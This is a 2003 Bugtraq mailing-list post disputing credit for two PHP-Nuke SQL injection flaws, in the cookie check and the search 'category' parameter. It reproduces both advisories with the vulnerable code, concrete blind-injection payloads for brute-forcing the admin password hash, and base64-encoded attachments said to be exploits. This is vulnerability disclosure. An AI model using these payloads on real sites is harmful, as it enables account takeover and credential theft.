[28978] in bugtraq
RE: PHPNuke SQL Injection
daemon@ATHENA.MIT.EDU (Oriol Carreas)
Fri Feb 21 18:01:43 2003
From: Oriol Carreas <uri@7a69ezine.org>
Reply-To: uri@7a69ezine.org
To: bugtraq@securityfocus.com
Date: Fri, 21 Feb 2003 05:26:09 +0100
MIME-Version: 1.0
Content-Description: clearsigned data
Content-Disposition: inline
Message-Id: <200302210524.32267.ripe@7a69ezine.org>
Content-Type: Multipart/Mixed;
boundary="Boundary-00=_hpaV+8a5MR+iEE8"
--Boundary-00=_hpaV+8a5MR+iEE8
Content-Type: Text/Plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Description: clearsigned data
Content-Disposition: inline
I don't like to claim for the authory of bugs, because It is not
possible to clarify who discovered/exploited first some bug because
some times we are too lazy to publish them for any reason. But this
is an special reason because the person that claims for the authory
of the TWO "PhpNuke SQL Injection" has discovered them at the same
time than me and exploits them _exactly_ the same way than me so I
think that it can not be a coincidence.
I've been testing the methods of explotation this last week and it
is possible that "David Zenter" (the person who write that advisory)
found that kind of attacks , programmed an exploit for them and
finally he wrote the advisory stealing the authory of this 2 bugs
I am not sure of that so I would like him to answer.
I discovered the $user bug one month ago ( In fact I searched the
website and I found that RFP found them some years ago , but he
didn't publish a succesfull way to exploit them).
I contacted Francisco Bucci ,the author of PhpNuke and I suggested
some patches to him ( and he published the patches in his website)
but phpnuke had still a lot of bugs so I waited to finish my job to
publish them.
PhpNuke has been here for a lot of time so I dont't believe that a
person finds the same _TWO_ bugs than me and exploits them in te
same way so I want "David Zenter" to clarify that.
I am developing another vulnerabilities , what is very strange for
me is that the 2 ones that I've developed are the ones that
"David Zenter" published.
Now I attach the two advisories and the two exploits that I had
written for these bugs judge for yourself if you thing that this
can be a coincidence.
PD.- Excuse my poor english :)
;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
PHPNUKE is_user || is_admin VULNERABILITY
;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
General Data :
=2D-------------
Aplicacion : PhpNuke.
Versions : <=3D 6.5 ( withouth the patch).
Vulnerability : Sql injection in the cookies user y admin.
: Access to the application at administration level
OR guess any user password.
Introduccion:
=2D------------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
PhpNuke doesn't chech the integrity of the cookies "user" and
"admin" that it uses to follow sessions, so it is posible to inject SQL
code and get de administration password.These coockies are encoded
using base64 so the "magic quotes" protection of PHP is not working.
Vulnerability:
=2D-------------
The Vulnerable function is found in the file "mainfile.php" :
=2D------------------------------------------------------------------------=
=2D-----
function is_user($user) {
global $prefix;
if(!is_array($user)) {
$user =3D base64_decode($user);
$user =3D explode(":", $user);
$uid =3D "$user[0]";
$pwd =3D "$user[2]";
} else {
$uid =3D "$user[0]";
$pwd =3D "$user[2]";
}
$result=3Dmysql_query("select pass from $prefix"._users."
where uid=3D'$uid'");
list($pass)=3Dmysql_fetch_row($result);
if($pass =3D=3D $pwd && $pass !=3D "") {
return 1;
} return 0;
}
=2D------------------------------------------------------------------------=
=2D-----
The function is_admin is almost like the other one.
There is no other integrity check to the cookie $user in the phpnuke
code so it is posible to inject SQL code in this way :
$user =3D base64_encode("uiduser' CODIGOSQL:noimporant:passowrd");
Most PhpNuke websites uses mysql 3.x so it is not posible to use UN=
ION
so initialy it seams dificult to exploit.
Way to exploit:
=2D--------------
To get information from that query we need a valid PhpNuke user, bu=
t=20
that is very easy because PhpNuke lets anybody create a user easily. Once w=
e=20
have a valid userid and a valid password we can send a query like:
SELECT pass from nuke_users where uid=3D'<target_uid>'
AND pass LIKE '<test>' OR uid=3D'<our_uid>'
This SELECT will give the password of "target_uid" if <test> is=20
correct or our password if that test is not correct. So we can retrieve=20
information from that query if we see if we are logged or not. This allows =
us=20
to bruteforce the target password with LIKE's ( we only check one character=
=20
at the same time )
PhpNuke uses md5 in version 6.x ( crypt in versions 5.x ) that give=
s=20
an average of 32*(16/2) =3D 256 tries to get a valid password.
I have tested this method and it is posible to get a valid password
within 10 minutes.
Example of a cookie using this method:
user =3D base64_encode("2' AND pass LIKE=20
'a12bc___________________________' OR=20
uid=3D'5612:noimportant:1234567889012345678901234567890ab");
Where '_' in LIKE's means any character.
Using that method we can find the cookie of _any_ user in phpnuke, in phpnu=
ke=20
5.x (I think) that is not possible to go further but in phpnuke 6.x we can=
=20
use the fact that the admin password is stored in nuke_authors and in=20
nuke_users.
In the test that I've done , the uid=3D2 in nuke_users is the uid=3D1=3Dadm=
in in
nuke_authors.
Patches:
=2D-------
There is a patch for this vulnerability in PhpNuke's website but I=
=20
must say that PhpNuke's seams to have some other vulnerabilites not yet=20
published.
Credit:
=2D-------
I found this vulnerability one month ago , I dind't believe that th=
is
vulnerability could be in PhpNuke!! , because it is very used and a lot of=
=20
people had already audited it before me , so I searched in google to find=20
that vulnerability I found that RFP had discovered that some years ago , in=
=20
PhpNuke 4.x !!! WooW , and it is still in PhpNuke!! :? RFP didn't find a wa=
y=20
to exploit that , but he discovered this vuln.
;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
PHPNUKE Search vulnerability
;=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
General data :
=2D-------------
Aplicacion : PhpNuke.
Versions : <=3D 6.5 ( withouth the patch).
Vulnerability : Sql injection in the search form.
: Access to the application at administration level
OR guess any user password.
Introduction:
=2D--------
PhpNuke is a well known content management system programed
in PHP by Francisco Bucci, a lot of people use it because it is very
easy to install and manage.
PhpNuke doesn't check the parameter "category" in the search form
to be numeric, and when it builds the SQL query it does not enclose it
with quotes , so it is easy to inject SQL code, quotes will not be allowed
in this code because the "magic quotes" protection of phpnuke would add
slashes to them
Vulnerabilitu:
=2D--------------
The vulnerable code is in modules/Search/index.php in PhpNuke 6.x
and in /search.php in PhpNuke 5.x
=2D------------------------------------------------------------------------=
=2D-----
if ($category > 0) {
$categ =3D "AND catid=3D$category ";
} elseif ($category =3D=3D 0) {
$categ =3D "";
}
$q =3D "select s.sid, s.aid, s.informant, s.title, s.time, s.hometext,=20
s.bodytext,
a.url, s.comments, s.topic from ".$prefix. "_stories s,=20
".$prefix."_authors
a where s.aid=3Da.aid $queryalang $categ";
=2D------------------------------------------------------------------------=
=2D-----
This query is done using the nuke_authors table , ( with de variabl=
e=20
'a' ). so it is posible to get the admin password using a tecnique similar =
to=20
the last advisory.
Explotation Method:
=2D------------------
As I said in the last advisory PhpNuke mainly uses MySQL 3.x so it =
is
not posible to use UNION's tot get the admin password ( in this case it wou=
ld=20
be possible to get the admin password string directly with unions )
But we can use a similar tecnique to the last advisory but withouth
using quotes , if we inject :
AND MID(a.pwd,characternumber,1) =3D CHAR( characterascii)
If characterascii is valid the query will give us the search result
otherwise it won't give us anything.This allows us to bruteforce the
administration password, wich can be done with less than 10 minutes.
Other parameters can be retrieved using this tecnique:
* a.uname : needed to log in phpnuke using the admin cookie.
* user() : mysql user , if it is root we can use some=20
tecniques like creating a file etc ...
* database()
* useyouimagination ...
Patches:
=2D-------
As far as I am concerned there is not an official patch , but a=20
workarround is very easy , you just have to enquote the 'category' paramete=
r=20
and test that it is a numeric field.
Credit:
=2D-------
I don't know anybody who has already discovered that If you feel th=
at=20
I am not correct please contact with me.
Vulnerability developed by : Oriol Carreras - <uri@7a69ezine.org>
=2D-=20
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
>
> http://ripe.7a69ezine.org
>=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
--Boundary-00=_hpaV+8a5MR+iEE8
Content-Type: application/x-tgz;
name="search.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="search.tar.gz"
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
--Boundary-00=_hpaV+8a5MR+iEE8
Content-Type: application/x-tgz;
name="user.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="user.tar.gz"
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
--Boundary-00=_hpaV+8a5MR+iEE8--
